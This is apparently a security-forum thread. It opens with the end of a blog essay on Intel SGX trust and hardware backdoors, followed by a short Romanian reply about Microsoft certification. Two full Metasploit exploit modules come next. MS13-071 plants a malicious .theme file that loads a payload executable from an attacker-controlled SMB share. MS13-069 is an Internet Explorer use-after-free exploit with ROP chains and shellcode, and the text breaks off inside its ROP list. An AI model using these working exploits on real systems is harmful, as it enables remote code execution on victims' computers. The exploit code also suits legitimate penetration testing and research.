we currently, in Qubes OS, keep in separate Service VMs, such as networking stacks, USB stacks, etc. Remember that Intel SGX provides convenient mechanism to build inter-enclave secure communication channels. We could also take the “GUI domain” (currently this is just Dom0 in Qubes OS) and move it into a separate SGX enclave. If only Intel came up with solid protected input and output technologies that would work well with SGX, then this would suddenly make whole lots of sense (unlike currently where it is very challenging). What we win this way is that no longer a bug in the hypervisor should be critical, as it would be now a long way for the attacker who compromised the hypervisor to steal any real secret of the user, because there are no secrets in the hypervisor itself. In this setup the two most critical enclaves are: 1) the GUI enclave, of course, and 2) the admin enclave, although it is thinkable that the latter could be made reasonably deprivileged in that it might only be allowed to create/remove VMs, setup networking and other policies for them, but no longer be able to read and write memory of the VMs (Anti Snowden Protection, ASP?). And... why use hypervisors? Why not use the same approach to compartmentalize ordinary operating systems? Well, this could be done, of course, but it would require considerable rewrite of the systems, essentially turning them into microkernels (except for the fact that the microkernel would no longer need to be trusted), as well as the applications and drivers, and we know that this will never happen. Again, let me repeat one more time: the whole point of using virtualization for security is that it wraps up all the huge APIs of an ordinary OS, like Win32 or POSIX, or OSX, into a virtual machine that itself requires orders of magnitude simpler interface to/from the outside world (especially true for paravirtualized VMs), and all this without the need to rewrite the applications. Trusting Intel – Next Generation of Backdooring? We have seen that SGX offers a number of attractive functionality that could potentially make our digital systems more secure and 3rd party servers more trusted. But does it really? The obvious question, especially in the light of recent revelations about NSA backdooring everything and the kitchen sink, is whether Intel will have backdoors allowing “privileged entities” to bypass SGX protections? Traditional CPU backdooring Of course they could, no question about it. But one can say that Intel (as well as AMD) might have been having backdoors in their processors for a long time, not necessarily in anything related to SGX, TPM, TXT, AMT, etc. Intel could have built backdoors into simple MOV or ADD instructions, in such a way that they would automatically disable ring/page protections whenever executed with some magic arguments. I wrote more about this many years ago. The problem with those “traditional” backdoors is that Intel (or a certain agency) could be caught using it, and this might have catastrophic consequences for Intel. Just imagine somebody discovered (during a forensic analysis of an incident) that doing: MOV eax, $deadbeef MOV ebx, $babecafe ADD eax, ebx ...causes ring elevation for the next 1000 cycles. All the processors affected would suddenly became equivalents of the old 8086 and would have to be replaced. Quite a marketing nightmare I think, no? Next-generation CPU backdooring But as more and more crypto and security mechanisms got delegated from software to the processor, the more likely it becomes for Intel (or AMD) to insert really “plausibly deniable” backdoors into processors. Consider e.g. the recent paper on how to plant a backdoor into the Intel's Ivy Bridge's random number generator (usable via the new RDRAND instruction). The backdoor reduces the actual entropy of the generator making it feasible to later brute-force any crypto which uses keys generated via the weakened generator. The paper goes into great lengths describing how this backdoor could be injected by a malicious foundry (e.g. one in China), behind the Intel's back, which is achieved by implementing the backdoor entirely below the HDL level. The paper takes a “classic” view on the threat model with Good Americans (Intel engineers) and the Bad Chinese (foundry operators/employees). Nevertheless, it should be obvious that Intel could have planted such a backdoor without any effort or challenge described in the paper, because they could do so at any level, not necessarily below HDL. But backdooring an RNG is still something that leaves traces. Even though the backdoored processor can apparently pass all external “randomness” testes, such as the NIST testsuite, they still might be caught. Perhaps because somebody will buy 1000 processors and will run them for a year and will note down all the numbers generated and then conclude that the distribution is quite not right. Or something like that. Or perhaps because somebody will reverse-engineer the processor and specifically the RNG circuitry and notice some gates are shorted to GND. Or perhaps because somebody at this “Bad Chinese” foundry will notice that. Let's now get back to Intel SGX -- what is the actual Root of Trust for this technology? Of course, the processor, just like for the old ring3/ring0 separation. But for SGX there is additional Root of Trust which is used for remote attestation, and this is the private key(s) used for signing the Quote Messages. If the signing private key somehow got into the hands of an adversary, the remote attestation breaks down completely. Suddenly the “SGX Blackboxed” apps and malware can readily be decrypted, disassembled and reverse engineered, because the adversary can now emulate their execution step by step under a debugger and still pass the remote attestation. We might say this is good, as we don't want irreversible malware and apps. But then, suddenly, we also loose our attractive “trusted cloud” too – now there is nothing that could stop the adversary, who has the private signing key, to run our trusted VM outside of SGX, yet still reporting to us that it is SGX-protected. And so, while we believe that our trusted VM should be trusted and unsniffable, and while we devote all our deepest secrets to it, the adversary can read them all like on a plate. And the worst thing is – even if somebody took such a processor, disassembled it into pieces, analyzed transitor-by-transitor, recreated HDL, analyzed it all, then still it all would look good. Because the backdoor is... the leaked private key that is now also in the hands of the adversary, and there is no way to prove it by looking at the processor alone. As I understand, the whole idea of having a separate TPM chip, was exactly to make such backdoor-by-leaking-keys more difficult, because, while we're all forced to use Intel or AMD processors today, it is possible that e.g. every country can produce their own TPM, as it's million times less complex than a modern processor. So, perhaps Russia could use their own TPMs, which they might be reasonably sure they use private keys which have not be handed over to the NSA. However, as I mentioned in the first part of this article, sadly, this scheme doesn't work that well. The processor can still cheat the external TPM module. For example, in case of an Intel TXT and TPM – the processor can produce incorrect PCR values in response to certain trigger – in that case it no longer matters that the TPM is trusted and keys not leaked, because the TPM will sign wrong values. On the other hand we go back now to using “traditional” backdoors in the processors, whose main disadvantage is that people might got cought using them (e.g. somebody analyzed an exploit which turns out to be triggering correct Quote message despite incorrect PCRs). So, perhaps, the idea of separate TPM actually does make some sense after all? What about just accidental bugs in Intel products? Conspiracy theories aside, what about accidental bugs? What are the chances of SGX being really foolproof, at least against those unlucky adversaries who didn't get access to the private signing keys? The Intel's processor have become quite a complex beasts these days. And if you also thrown in the Memory Controller Hub, it's unimaginably complex beast. Let's take a quick tour back discussing some spectacular attacks against Intel “hardware” security mechanisms. I wrote “hardware” in quotation marks, because really most of these technologies is software, like most of the things in electronics these days. Nevertheless the “hardware enforced security” does have a special appeal to lots of people, often creating an impression that these must be some ultimate unbreakable technologies.... I think it all started with our exploit against Intel Q35 chipset (slides 15+) demonstrated back in 2008 which was the first attack allowing to compromise, otherwise hardware-protected, SMM memory on Intel platforms (some other attacks against SMM shown before assumed the SMM was not protected, which was the case on many older platforms). This was then shortly followed by another paper from us about attacking Intel Trusted Execution Technology (TXT), which found out and exploited a fact that TXT-loaded code was not protected against code running in the SMM mode. We used our previous attack on Q35 against SMM, as well as found a couple of new ones, in order to compromise SMM, plant a backdoor there, and then compromise TXT-loaded code from there. The issue highlighted in the paper has never really been correctly patched. Intel has spent years developing something they called STM, which was supposed to be a thin hypervisor for SMM code sandboxing. I don't know if the Intel STM specification has eventually been made public, and how many bugs it might be introducing on systems using it, or how much inaccurate it might be. In the following years we presented two more devastating attacks against Intel TXT (none of which depending on compromised SMM): one which exploited a subtle bug in the processor SINIT module allowing to misconfigure VT-d protections for TXT-loaded code, and another one exploiting a classic buffer overflow bug also in the processor's SINIT module, allowing this time not only to fully bypass TXT, but also fully bypass Intel Launch Control Policy and hijack SMM (several years after our original papers on attacking SMM the old bugs got patched and so this was also attractive as yet another way to compromise SMM for whatever other reason). Invisible Things Lab has also presented first, and as far as I'm aware still the only one, attack on Intel BIOS that allowed to reflash the BIOS despite Intel's strong “hardware” protection mechanism to allow only digitally signed code to be flashed. We also found out about secret processor in the chipset used for execution of Intel AMT code and we found a way to inject our custom code into this special AMT environment and have it executed in parallel with the main system, unconstrained by any other entity. This is quite a list of Intel significant security failures, which I think gives something to think about. At the very least that just because something is “hardware enforced” or “hardware protected” doesn't mean it is foolproof against software exploits. Because, it should be clearly said, all our exploits mentioned above were pure software attacks. But, to be fair, we have never been able to break Intel core memory protection (ring separation, page protection) or Intel VT-x. Rafal Wojtczuk has probably came closest with his SYSRET attack in an attempt to break the ring separation, but ultimately the Intel's excuse was that the problem was on the side of the OS developers who didn't notice subtle differences in the behavior of SYSRET between AMD and Intel processors, and didn't make their kernel code defensive enough against Intel processor's odd behavior. We have also demonstrated rather impressive attacks bypassing Intel VT-d, but, again, to be fair, we should mention that the attacks were possible only on those platforms which Intel didn't equip with so called Interrupt Remapping hardware, and that Intel knew that such hardware was indeed needed and was planning it a few years before our attacks were published. So, is Intel SGX gonna be as insecure as Intel TXT, or as secure as Intel VT-x....? The bottom line Intel SGX promises some incredible functionality – to create protected execution environments (called enclaves) within untrusted (compromised) Operating System. However, for SGX to be of any use on a client OS, it is important that we also have technologies to implement trusted output and input from/to the SGX enclave. Intel currently provides little details about the former and openly admits it doesn't have the later. Still, even without trusted input and output technologies, SGX might be very useful in bringing trust to the cloud, by allowing users to create trusted VMs inside untrusted provider infrastructure. However, at the same time, it could allow to create applications and malware that could not be reversed engineered. It's quote ironic that those two applications (trusted cloud and irreversible malware) are mutually bound together, so that if one wanted to add a backdoor to allow A/V industry to be able to analyze SGX-protected malware, then this very same backdoor could be used to weaken the guarantees of the trustworthiness of the user VMs in the cloud. Finally, a problem that is hard to ignore today, in the post-Snowden world, is the ease of backdooring this technology by Intel itself. In fact Intel doesn't need to add anything to their processors – all they need to do is to give away the private signing keys used by SGX for remote attestation. This makes for a perfectly deniable backdoor – nobody could catch Intel on this, even if the processor was analyzed transistor-by-transistor, HDL line-by-line. As a system architect I would love to have Intel SGX, and I would love to believe it is secure. It would allow to further decompose Qubes OS, specifically get rid of the hypervisor from the TCB, and probably even more. Special thanks to Oded Horowitz for turning my attention towards Intel SGX. Posted by Joanna Rutkowska at Monday, September 23, 2013 Sursa: The Invisible Things Lab's blog: Thoughts on Intel's upcoming Software Guard Extensions (Part 2)
  14. Eu am asta: https://www.microsoft.com/learning/en-us/exam.aspx?id=70-660&locale=en-us Bine, nu am platit nimic pentru ea, dar oricum costa cam 50 de dolari (pentru studenti) ceea ce nu cred ca e mult. Daca vrei sa dai o certificare Microsoft, vorbeste cu cei de la MSP (Microsoft Student Partners) din facultate.
  15. MS13-071 Microsoft Windows Theme File Handling Arbitrary Code Execution Authored by Eduardo Prado, juan vazquez | Site metasploit.com This Metasploit module exploits a vulnerability mainly affecting Microsoft Windows XP and Windows 2003. The vulnerability exists in the handling of the Screen Saver path, in the [boot] section. An arbitrary path can be used as screen saver, including a remote SMB resource, which allows for remote code execution when a malicious .theme file is opened, and the "Screen Saver" tab is viewed. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT include Msf::Exploit::EXE include Msf::Exploit::Remote::SMBServer def initialize(info={}) super(update_info(info, 'Name' => "MS13-071 Microsoft Windows Theme File Handling Arbitrary Code Execution", 'Description' => %q{ This module exploits a vulnerability mainly affecting Microsoft Windows XP and Windows 2003. The vulnerability exists in the handling of the Screen Saver path, in the [boot] section. An arbitrary path can be used as screen saver, including a remote SMB resource, which allows for remote code execution when a malicious .theme file is opened, and the "Screen Saver" tab is viewed. }, 'License' => MSF_LICENSE, 'Author' => [ 'Eduardo Prado', # Vulnerability discovery 'juan vazquez' # Metasploit module ], 'References' => [ ['CVE', '2013-0810'], ['OSVDB', '97136'], ['MSB', 'MS13-071'], ['BID', '62176'] ], 'Payload' => { 'Space' => 2048, 'DisableNops' => true }, 'DefaultOptions' => { 'DisablePayloadHandler' => 'false' }, 'Platform' => 'win', 'Targets' => [ ['Windows XP SP3 / Windows 2003 SP2', {}], ], 'Privileged' => false, 'DisclosureDate' => "Sep 10 2013", 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [true, 'The theme file', 'msf.theme']), OptString.new('UNCPATH', [ false, 'Override the UNC path to use (Ex: \\\\192.168.1.1\\share\\exploit.scr)' ]) ], self.class) end def exploit if (datastore['UNCPATH']) @unc = datastore['UNCPATH'] print_status("Remember to share the malicious EXE payload as #{@unc}") else print_status("Generating our malicious executable...") @exe = generate_payload_exe my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST'] @share = rand_text_alpha(5 + rand(5)) @scr_file = "#{rand_text_alpha(5 + rand(5))}.scr" @hi, @lo = UTILS.time_unix_to_smb(Time.now.to_i) @unc = "\\\\#{my_host}\\#{@share}\\#{@scr_file}" end print_status("Creating '#{datastore['FILENAME']}' file ...") # Default Windows XP / 2003 theme modified theme = <<-EOF ; Copyright © Microsoft Corp. 1995-2001 [Theme] DisplayName=@themeui.dll,-2016 ; My Computer [CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\DefaultIcon] DefaultValue=%WinDir%explorer.exe,0 ; My Documents [CLSID\\{450D8FBA-AD25-11D0-98A8-0800361B1103}\\DefaultIcon] DefaultValue=%WinDir%SYSTEM32\\mydocs.dll,0 ; My Network Places [CLSID\\{208D2C60-3AEA-1069-A2D7-08002B30309D}\\DefaultIcon] DefaultValue=%WinDir%SYSTEM32\\shell32.dll,17 ; Recycle Bin [CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\DefaultIcon] full=%WinDir%SYSTEM32\\shell32.dll,32 empty=%WinDir%SYSTEM32\\shell32.dll,31 [Control Panel\\Desktop] Wallpaper= TileWallpaper=0 WallpaperStyle=2 Pattern= ScreenSaveActive=0 [boot] SCRNSAVE.EXE=#{@unc} [MasterThemeSelector] MTSM=DABJDKT EOF file_create(theme) print_good("Let your victim open #{datastore['FILENAME']}") if not datastore['UNCPATH'] print_status("Ready to deliver your payload on #{@unc}") super end end # TODO: these smb_* methods should be moved up to the SMBServer mixin # development and test on progress def smb_cmd_dispatch(cmd, c, buff) smb = @state[c] vprint_status("Received command #{cmd} from #{smb[:name]}") pkt = CONST::SMB_BASE_PKT.make_struct pkt.from_s(buff) #Record the IDs smb[:process_id] = pkt['Payload']['SMB'].v['ProcessID'] smb[:user_id] = pkt['Payload']['SMB'].v['UserID'] smb[:tree_id] = pkt['Payload']['SMB'].v['TreeID'] smb[:multiplex_id] = pkt['Payload']['SMB'].v['MultiplexID'] case cmd when CONST::SMB_COM_NEGOTIATE smb_cmd_negotiate(c, buff) when CONST::SMB_COM_SESSION_SETUP_ANDX wordcount = pkt['Payload']['SMB'].v['WordCount'] if wordcount == 0x0D # It's the case for Share Security Mode sessions smb_cmd_session_setup(c, buff) else vprint_status("SMB Capture - #{smb[:ip]} Unknown SMB_COM_SESSION_SETUP_ANDX request type , ignoring... ") smb_error(cmd, c, CONST::SMB_STATUS_SUCCESS) end when CONST::SMB_COM_TRANSACTION2 smb_cmd_trans(c, buff) when CONST::SMB_COM_NT_CREATE_ANDX smb_cmd_create(c, buff) when CONST::SMB_COM_READ_ANDX smb_cmd_read(c, buff) else vprint_status("SMB Capture - Ignoring request from #{smb[:name]} - #{smb[:ip]} (#{cmd})") smb_error(cmd, c, CONST::SMB_STATUS_SUCCESS) end end def smb_cmd_negotiate(c, buff) pkt = CONST::SMB_NEG_PKT.make_struct pkt.from_s(buff) dialects = pkt['Payload'].v['Payload'].gsub(/\x00/, '').split(/\x02/).grep(/^\w+/) dialect = dialects.index("NT LM 0.12") || dialects.length-1 pkt = CONST::SMB_NEG_RES_NT_PKT.make_struct smb_set_defaults(c, pkt) time_hi, time_lo = UTILS.time_unix_to_smb(Time.now.to_i) pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NEGOTIATE pkt['Payload']['SMB'].v['Flags1'] = 0x88 pkt['Payload']['SMB'].v['Flags2'] = 0xc001 pkt['Payload']['SMB'].v['WordCount'] = 17 pkt['Payload'].v['Dialect'] = dialect pkt['Payload'].v['SecurityMode'] = 2 # SHARE Security Mode pkt['Payload'].v['MaxMPX'] = 50 pkt['Payload'].v['MaxVCS'] = 1 pkt['Payload'].v['MaxBuff'] = 4356 pkt['Payload'].v['MaxRaw'] = 65536 pkt['Payload'].v['SystemTimeLow'] = time_lo pkt['Payload'].v['SystemTimeHigh'] = time_hi pkt['Payload'].v['ServerTimeZone'] = 0x0 pkt['Payload'].v['SessionKey'] = 0 pkt['Payload'].v['Capabilities'] = 0x80f3fd pkt['Payload'].v['KeyLength'] = 8 pkt['Payload'].v['Payload'] = Rex::Text.rand_text_hex(8) c.put(pkt.to_s) end def smb_cmd_session_setup(c, buff) pkt = CONST::SMB_SETUP_RES_PKT.make_struct smb_set_defaults(c, pkt) pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_SESSION_SETUP_ANDX pkt['Payload']['SMB'].v['Flags1'] = 0x88 pkt['Payload']['SMB'].v['Flags2'] = 0xc001 pkt['Payload']['SMB'].v['WordCount'] = 3 pkt['Payload'].v['AndX'] = 0x75 pkt['Payload'].v['Reserved1'] = 00 pkt['Payload'].v['AndXOffset'] = 96 pkt['Payload'].v['Action'] = 0x1 # Logged in as Guest pkt['Payload'].v['Payload'] = Rex::Text.to_unicode("Unix", 'utf-16be') + "\x00\x00" + # Native OS # Samba signature Rex::Text.to_unicode("Samba 3.4.7", 'utf-16be') + "\x00\x00" + # Native LAN Manager # Samba signature Rex::Text.to_unicode("WORKGROUP", 'utf-16be') + "\x00\x00\x00" + # Primary DOMAIN # Samba signature tree_connect_response = "" tree_connect_response << [7].pack("C") # Tree Connect Response : WordCount tree_connect_response << [0xff].pack("C") # Tree Connect Response : AndXCommand tree_connect_response << [0].pack("C") # Tree Connect Response : Reserved tree_connect_response << [0].pack("v") # Tree Connect Response : AndXOffset tree_connect_response << [0x1].pack("v") # Tree Connect Response : Optional Support tree_connect_response << [0xa9].pack("v") # Tree Connect Response : Word Parameter tree_connect_response << [0x12].pack("v") # Tree Connect Response : Word Parameter tree_connect_response << [0].pack("v") # Tree Connect Response : Word Parameter tree_connect_response << [0].pack("v") # Tree Connect Response : Word Parameter tree_connect_response << [13].pack("v") # Tree Connect Response : ByteCount tree_connect_response << "A:\x00" # Service tree_connect_response << "#{Rex::Text.to_unicode("NTFS")}\x00\x00" # Extra byte parameters # Fix the Netbios Session Service Message Length # to have into account the tree_connect_response, # need to do this because there isn't support for # AndX still my_pkt = pkt.to_s + tree_connect_response original_length = my_pkt[2, 2].unpack("n").first original_length = original_length + tree_connect_response.length my_pkt[2, 2] = [original_length].pack("n") c.put(my_pkt) end def smb_cmd_create(c, buff) pkt = CONST::SMB_CREATE_PKT.make_struct pkt.from_s(buff) if pkt['Payload'].v['Payload'] =~ /#{Rex::Text.to_unicode("#{@scr_file}\x00")}/ pkt = CONST::SMB_CREATE_RES_PKT.make_struct smb_set_defaults(c, pkt) pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_CREATE_ANDX pkt['Payload']['SMB'].v['Flags1'] = 0x88 pkt['Payload']['SMB'].v['Flags2'] = 0xc001 pkt['Payload']['SMB'].v['WordCount'] = 42 pkt['Payload'].v['AndX'] = 0xff # no further commands pkt['Payload'].v['OpLock'] = 0x2 # No need to track fid here, we're just offering one file pkt['Payload'].v['FileID'] = rand(0x7fff) + 1 # To avoid fid = 0 pkt['Payload'].v['Action'] = 0x1 # The file existed and was opened pkt['Payload'].v['CreateTimeLow'] = @lo pkt['Payload'].v['CreateTimeHigh'] = @hi pkt['Payload'].v['AccessTimeLow'] = @lo pkt['Payload'].v['AccessTimeHigh'] = @hi pkt['Payload'].v['WriteTimeLow'] = @lo pkt['Payload'].v['WriteTimeHigh'] = @hi pkt['Payload'].v['ChangeTimeLow'] = @lo pkt['Payload'].v['ChangeTimeHigh'] = @hi pkt['Payload'].v['Attributes'] = 0x80 # Ordinary file pkt['Payload'].v['AllocLow'] = 0x100000 pkt['Payload'].v['AllocHigh'] = 0 pkt['Payload'].v['EOFLow'] = @exe.length pkt['Payload'].v['EOFHigh'] = 0 pkt['Payload'].v['FileType'] = 0 pkt['Payload'].v['IPCState'] = 0x7 pkt['Payload'].v['IsDirectory'] = 0 c.put(pkt.to_s) else pkt = CONST::SMB_CREATE_RES_PKT.make_struct smb_set_defaults(c, pkt) pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_CREATE_ANDX pkt['Payload']['SMB'].v['ErrorClass'] = 0xC0000034 # OBJECT_NAME_NOT_FOUND pkt['Payload']['SMB'].v['Flags1'] = 0x88 pkt['Payload']['SMB'].v['Flags2'] = 0xc001 c.put(pkt.to_s) end end def smb_cmd_read(c, buff) pkt = CONST::SMB_READ_PKT.make_struct pkt.from_s(buff) offset = pkt['Payload'].v['Offset'] length = pkt['Payload'].v['MaxCountLow'] pkt = CONST::SMB_READ_RES_PKT.make_struct smb_set_defaults(c, pkt) pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_READ_ANDX pkt['Payload']['SMB'].v['Flags1'] = 0x88 pkt['Payload']['SMB'].v['Flags2'] = 0xc001 pkt['Payload']['SMB'].v['WordCount'] = 12 pkt['Payload'].v['AndX'] = 0xff # no more commands pkt['Payload'].v['Remaining'] = 0xffff pkt['Payload'].v['DataLenLow'] = length pkt['Payload'].v['DataOffset'] = 59 pkt['Payload'].v['DataLenHigh'] = 0 pkt['Payload'].v['Reserved3'] = 0 pkt['Payload'].v['Reserved4'] = 6 pkt['Payload'].v['ByteCount'] = length pkt['Payload'].v['Payload'] = @exe[offset, length] c.put(pkt.to_s) end def smb_cmd_trans(c, buff) pkt = CONST::SMB_TRANS2_PKT.make_struct pkt.from_s(buff) sub_command = pkt['Payload'].v['SetupData'].unpack("v").first case sub_command when 0x5 # QUERY_PATH_INFO smb_cmd_trans_query_path_info(c, buff) when 0x1 # FIND_FIRST2 smb_cmd_trans_find_first2(c, buff) else pkt = CONST::SMB_TRANS_RES_PKT.make_struct smb_set_defaults(c, pkt) pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2 pkt['Payload']['SMB'].v['Flags1'] = 0x88 pkt['Payload']['SMB'].v['Flags2'] = 0xc001 pkt['Payload']['SMB'].v['ErrorClass'] = 0xc0000225 # NT_STATUS_NOT_FOUND c.put(pkt.to_s) end end def smb_cmd_trans_query_path_info(c, buff) pkt = CONST::SMB_TRANS2_PKT.make_struct pkt.from_s(buff) if pkt['Payload'].v['SetupData'].length < 16 # if QUERY_PATH_INFO_PARAMETERS doesn't include a file name, # return a Directory answer pkt = CONST::SMB_TRANS_RES_PKT.make_struct smb_set_defaults(c, pkt) pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2 pkt['Payload']['SMB'].v['Flags1'] = 0x88 pkt['Payload']['SMB'].v['Flags2'] = 0xc001 pkt['Payload']['SMB'].v['WordCount'] = 10 pkt['Payload'].v['ParamCountTotal'] = 2 pkt['Payload'].v['DataCountTotal'] = 40 pkt['Payload'].v['ParamCount'] = 2 pkt['Payload'].v['ParamOffset'] = 56 pkt['Payload'].v['DataCount'] = 40 pkt['Payload'].v['DataOffset'] = 60 pkt['Payload'].v['Payload'] = "\x00" + # Padding # QUERY_PATH_INFO Parameters "\x00\x00" + # EA Error Offset "\x00\x00" + # Padding #QUERY_PATH_INFO Data [@lo, @hi].pack("VV") + # Created [@lo, @hi].pack("VV") + # Last Access [@lo, @hi].pack("VV") + # Last Write [@lo, @hi].pack("VV") + # Change "\x10\x00\x00\x00" + # File attributes => directory "\x00\x00\x00\x00" # Unknown c.put(pkt.to_s) else # if QUERY_PATH_INFO_PARAMETERS includes a file name, # returns an object name not found error pkt = CONST::SMB_TRANS_RES_PKT.make_struct smb_set_defaults(c, pkt) pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2 pkt['Payload']['SMB'].v['ErrorClass'] = 0xC0000034 #OBJECT_NAME_NOT_FOUND pkt['Payload']['SMB'].v['Flags1'] = 0x88 pkt['Payload']['SMB'].v['Flags2'] = 0xc001 c.put(pkt.to_s) end end def smb_cmd_trans_find_first2(c, buff) pkt = CONST::SMB_TRANS_RES_PKT.make_struct smb_set_defaults(c, pkt) file_name = Rex::Text.to_unicode(@scr_file) pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2 pkt['Payload']['SMB'].v['Flags1'] = 0x88 pkt['Payload']['SMB'].v['Flags2'] = 0xc001 pkt['Payload']['SMB'].v['WordCount'] = 10 pkt['Payload'].v['ParamCountTotal'] = 10 pkt['Payload'].v['DataCountTotal'] = 94 + file_name.length pkt['Payload'].v['ParamCount'] = 10 pkt['Payload'].v['ParamOffset'] = 56 pkt['Payload'].v['DataCount'] = 94 + file_name.length pkt['Payload'].v['DataOffset'] = 68 pkt['Payload'].v['Payload'] = "\x00" + # Padding # FIND_FIRST2 Parameters "\xfd\xff" + # Search ID "\x01\x00" + # Search count "\x01\x00" + # End Of Search "\x00\x00" + # EA Error Offset "\x00\x00" + # Last Name Offset "\x00\x00" + # Padding #QUERY_PATH_INFO Data [94 + file_name.length].pack("V") + # Next Entry Offset "\x00\x00\x00\x00" + # File Index [@lo, @hi].pack("VV") + # Created [@lo, @hi].pack("VV") + # Last Access [@lo, @hi].pack("VV") + # Last Write [@lo, @hi].pack("VV") + # Change [@exe.length].pack("V") + "\x00\x00\x00\x00" + # End Of File "\x00\x00\x10\x00\x00\x00\x00\x00" + # Allocation size "\x80\x00\x00\x00" + # File attributes => directory [file_name.length].pack("V") + # File name len "\x00\x00\x00\x00" + # EA List Lenght "\x00" + # Short file lenght "\x00" + # Reserved ("\x00" * 24) + file_name c.put(pkt.to_s) end end Sursa: MS13-071 Microsoft Windows Theme File Handling Arbitrary Code Execution ? Packet Storm
  16. MS13-069 Microsoft Internet Explorer CCaret Use-After-Free Authored by corelanc0d3r, sinn3r | Site metasploit.com This Metasploit module exploits a use-after-free vulnerability found in Internet Explorer, specifically in how the browser handles the caret (text cursor) object. In IE's standards mode, the caret handling's vulnerable state can be triggered by first setting up an editable page with an input field, and then we can force the caret to update in an onbeforeeditfocus event by setting the body's innerHTML property. In this event handler, mshtml!CCaret::`vftable' can be freed using a document.write() function, however, mshtml!CCaret::UpdateScreenCaret remains unaware of this change, and still uses the same reference to the CCaret object. When the function tries to use this invalid reference to call a virtual function at offset 0x2c, it finally results a crash. Precise control of the freed object allows arbitrary code execution under the context of the user. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML def initialize(info={}) super(update_info(info, 'Name' => "MS13-069 Microsoft Internet Explorer CCaret Use-After-Free", 'Description' => %q{ This module exploits a use-after-free vulnerability found in Internet Explorer, specifically in how the browser handles the caret (text cursor) object. In IE's standards mode, the caret handling's vulnerable state can be triggered by first setting up an editable page with an input field, and then we can force the caret to update in an onbeforeeditfocus event by setting the body's innerHTML property. In this event handler, mshtml!CCaret::`vftable' can be freed using a document.write() function, however, mshtml!CCaret::UpdateScreenCaret remains unaware of this change, and still uses the same reference to the CCaret object. When the function tries to use this invalid reference to call a virtual function at offset 0x2c, it finally results a crash. Precise control of the freed object allows arbitrary code execution under the context of the user. }, 'License' => MSF_LICENSE, 'Author' => [ 'corelanc0d3r', # Vuln discovery & PoC (@corelanc0d3r) 'sinn3r' # Metasploit (@_sinn3r) ], 'References' => [ [ 'CVE', '2013-3205' ], [ 'OSVDB', '97094' ], [ 'MSB', 'MS13-069' ], [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-217/' ] ], 'Platform' => 'win', 'Targets' => [ [ 'Automatic', {} ], [ # Win 7 target on hold until we have a stable custom spray for it 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'TargetAddr' => 0x1ec20101, # Allocs @ 1ec20020 (+0xe1 bytes to be null-byte free) - in ecx 'PayloadAddr' => 0x1ec20105, # where the ROP payload begins 'Pivot' => 0x77C4FA1A, # mov esp,ebx; pop ebx; ret 'PopESP' => 0x77C37422, # pop esp; ret (pivot to a bigger space) 'Align' => 0x77c4d801 # add esp, 0x2c; ret (ROP gadget to jmp over pivot gadget) } ] ], 'Payload' => { # Our property sprays dislike null bytes 'BadChars' => "\x00", # Fix the stack again before the payload is executed. # If we don't do this, meterpreter fails due to a bad socket. 'Prepend' => "\x64\xa1\x18\x00\x00\x00" + # mov eax, fs:[0x18] "\x83\xC0\x08" + # add eax, byte 8 "\x8b\x20" + # mov esp, [eax] "\x81\xC4\x30\xF8\xFF\xFF", # add esp, -2000 # Fall back to the previous allocation so we have plenty of space # for the decoder to use 'PrependEncoder' => "\x81\xc4\x80\xc7\xfe\xff" # add esp, -80000 }, 'DefaultOptions' => { 'InitialAutoRunScript' => 'migrate -f' }, 'Privileged' => false, 'DisclosureDate' => "Sep 10 2013", 'DefaultTarget' => 0)) end def get_target(agent) return target if target.name != 'Automatic' nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || '' ie = agent.scan(/MSIE (\d)/).flatten[0] || '' ie_name = "IE #{ie}" case nt when '5.1' os_name = 'Windows XP SP3' end targets.each do |t| if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name)) return t end end nil end def get_payload(t) rop = [ 0x77c1e844, # POP EBP # RETN [msvcrt.dll] 0x77c1e844, # skip 4 bytes [msvcrt.dll] 0x77c4fa1c, # POP EBX # RETN [msvcrt.dll] 0xffffffff, 0x77c127e5, # INC EBX # RETN [msvcrt.dll] 0x77c127e5, # INC EBX # RETN [msvcrt.dll] 0x77c4e0da, # POP EAX # RETN [msvcrt.dll] 0x2cfe1467, # put delta into eax (-> put 0x00001000 into edx) 0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll] 0x77c58fbc, # XCHG EAX,EDX # RETN [msvcrt.dll] 0x77c34fcd, # POP EAX # RETN [msvcrt.dll] 0x2cfe04a7, # put delta into eax (-> put 0x00000040 into ecx) 0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll] 0x77c14001, # XCHG EAX,ECX # RETN [msvcrt.dll] 0x77c3048a, # POP EDI # RETN [msvcrt.dll] 0x77c47a42, # RETN (ROP NOP) [msvcrt.dll] 0x77c46efb, # POP ESI # RETN [msvcrt.dll] 0x77c2aacc, # JMP [EAX] [msvcrt.dll] 0x77c3b860, # POP EAX # RETN [msvcrt.dll] 0x77c1110c, # ptr to &VirtualAlloc() [IAT 